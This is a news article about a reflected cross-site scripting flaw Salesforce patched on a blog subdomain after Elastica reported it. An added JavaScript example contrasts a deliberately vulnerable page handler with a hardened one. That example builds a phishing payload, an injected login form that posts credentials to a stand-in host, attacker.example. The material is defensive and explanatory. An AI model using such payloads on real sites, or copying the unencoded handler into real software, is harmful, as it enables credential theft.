A cross-site scripting (XSS) vulnerability that could have opened the door to attackers has been patched by Salesforce after security researchers notified the company of their discovery. The vulnerability, which existed in a subdomain of the Salesforce.com cloud-based CRM platform, could have paved the way for phishing e-mails that looked legitimate: the links they carried would have pointed at a genuine salesforce.com address, with the malicious content injected into that real page rather than hosted on a look-alike domain.
Salesforce told us in a statement today that it investigated and fixed "a minor vulnerability impacting the blog site 'admin.salesforce.com,' which is not connected to the Salesforce application or customer data." The company added, "We have no evidence of impact to Salesforce customers or their data."
The patch was validated on Monday by Elastica, the San Jose-based cloud application security company that first discovered the vulnerability in early July. According to Elastica, phishing e-mails built on the flaw would have appeared trustworthy enough to trick users into entering their real login credentials, which attackers could then have used to access those accounts.
XSS Exploitation 'Most Prolific' Hack
Researchers in Elastica's Cloud Threat Labs said they discovered the vulnerability in a Salesforce subdomain used for blogging. The cross-site scripting (XSS) flaw failed to properly filter input from a remote user supplied as part of an HTTP request: a value taken from the request was reflected into the page without being encoded, so an attacker could craft a link to the real subdomain whose parameters carried HTML or script of the attacker's choosing. Elastica said this could have allowed hackers to "steal cookies and session identifiers, force users to visit phishing sites that extract credentials, and distribute malicious code to user machines."
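The following is an added example, not code from Elastica, Salesforce or the affected blog site, showing the pattern the researchers describe in a minimal form: a handler that reflects a query-string parameter into the page, once vulnerable and once hardened with contextual output encoding and a restrictive Content-Security-Policy. The hostnames, the `/search?q=` parameter and the injected sign-in form are all constructed for illustration and are not taken from the real vulnerability.

```javascript
// Added example (not Elastica's or Salesforce's code). Pure functions, so the
// handler can be exercised without starting a server. Hostnames and the "q"
// parameter are hypothetical.

// Encode a value for the HTML text and double-quoted attribute contexts.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the request parameter is concatenated straight into the markup, so
// whatever the attacker placed in the link the victim clicked is rendered as HTML
// on the trusted origin (a reflected XSS).
function renderVulnerable(term) {
  return `<html><body><h1>Search results for: ${term}</h1></body></html>`;
}

// Hardened: the same page, with the untrusted value encoded for its context.
function renderHardened(term) {
  return `<html><body><h1>Search results for: ${escapeHtml(term)}</h1></body></html>`;
}

// Defence in depth for the case where encoding is ever missed: no inline script,
// forms may only submit back to this origin, no <base> hijacking, no MIME sniffing.
function hardenedHeaders() {
  return {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; form-action 'self'; base-uri 'none'",
    "X-Content-Type-Options": "nosniff",
  };
}

// Handle a request given only its URL; returns the response the server would send.
function handle(requestUrl, { hardened }) {
  // Base URL is a placeholder so relative request URLs parse.
  const url = new URL(requestUrl, "https://blog.example");
  const term = url.searchParams.get("q") || "";
  return {
    status: 200,
    headers: hardened ? hardenedHeaders() : { "Content-Type": "text/html" },
    body: hardened ? renderHardened(term) : renderVulnerable(term),
  };
}

// Constructed payload of the kind the article warns about: a fake sign-in form
// injected into the genuine page, posting the victim's credentials to an
// attacker-controlled host (hypothetical hostname). URL-encoded as it would
// travel inside a phishing link.
const phishingForm =
  '<form action="https://attacker.example/collect" method="POST">' +
  "Your session has expired. Please sign in again:" +
  '<input name="username"><input name="password" type="password">' +
  "<button>Log in</button></form>";
const phishingLink = "/search?q=" + encodeURIComponent(phishingForm);

// Check whether a rendered page contains a live <form> element rather than an
// encoded "&lt;form" that the browser will only display as text.
function hasLiveForm(body) {
  return /<form\b/i.test(body);
}

// Quick self-check when run directly: the vulnerable page carries the injected
// form, the hardened page does not.
console.log("vulnerable page has live form:", hasLiveForm(handle(phishingLink, { hardened: false }).body));
console.log("hardened page has live form:  ", hasLiveForm(handle(phishingLink, { hardened: true }).body));
```

Note that `form-action 'self'` in the CSP is what blocks the credential exfiltration even if some other unencoded sink is found later, and that encoding alone is only correct for the HTML text and attribute contexts used here; a value dropped into a script block, a URL or a CSS property needs its own encoder.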
"Exploitation of XSS vulnerabilities is among the most prolific methods of Web application hacking today," said Aditya Sood, lead architect at Elastica's Cloud Threat Labs. "Although this particular flaw was only present in a Salesforce subdomain, exploiting the trust of the company's primary domain could have allowed attackers to easily implement phishing attacks to gain access to user credentials. With stolen credentials, attackers can then access users' accounts and exfiltrate sensitive data undetected for long periods of time."
Elastica said when it first reported its discovery to Salesforce and provided details on how to fix the problem, the company responded that it considered the vulnerability to be "less severe" because it wasn't in the main domain, Salesforce.com, and could target only selected users. After receiving a follow-up e-mail from Elastica noting that the vulnerability had "the potential to be exploited in the wild," Salesforce then patched the flaw.
'Offensive' Strategies Against Social Engineering Attacks
We reached out to Elastica's Sood to learn more about what companies can do to protect themselves from XSS and similar vulnerabilities. He said companies should release patches as soon as possible after learning of such vulnerabilities to "reduce the window of exposure."
Companies should implement a "multi-dimensional security approach" and also be sure to educate their employees about safe surfing habits and the "perils of phishing attacks," Sood added. In addition, they should put in place security controls to require two-factor authentication on all end-user devices used to access their systems, he noted.
"Interestingly, organizations can follow an offensive approach to conduct controlled social engineering attacks, i.e., phishing attacks, to understand how the infrastructure control works and how users react to that attack," he said.